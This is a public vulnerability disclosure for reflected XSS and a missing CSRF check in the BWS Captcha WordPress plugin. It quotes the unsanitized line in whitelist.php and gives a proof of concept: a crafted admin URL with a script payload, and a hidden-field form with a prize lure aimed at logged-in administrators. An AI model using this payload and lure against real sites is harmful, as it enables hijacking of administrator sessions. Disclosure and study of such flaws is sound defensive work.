* Exploit Title: BWS Captcha Multiple Vulnerabilities * Discovery Date:12.03.2015 * Public Disclosure Date:03.10.2016 * Exploit Author: Colette Chamberland * Contact: firstname.lastname@example.org * Vendor Homepage: http://bestwebsoft.com/ * Software Link: https://wordpress.org/plugins/captcha/ * Version: <=4.1.5 * Tested on: Wordpress 4.2.x * Category: Wordpress * CVE: Requested but none received Description ================================================================================ Unsanitized input in whitelist.php: 297: $message = __( 'Search results for', $this->textdomain ) . ' : ' . $_REQUEST['s']; PoC ================================================================================ The variable can be passed in using a get as well as a post. An attacker could send unsuspecting authenticated admin a url crafted like such: http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E or they can send a form (no CSRF token check) <form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist"> <input type="hidden" name="s" value="<script>alert(1);</script>"> <input type="submit" name="Search IP" value="Click here to claim your prize!"> </form> and it would execute XSS as long as they were logged in to the site.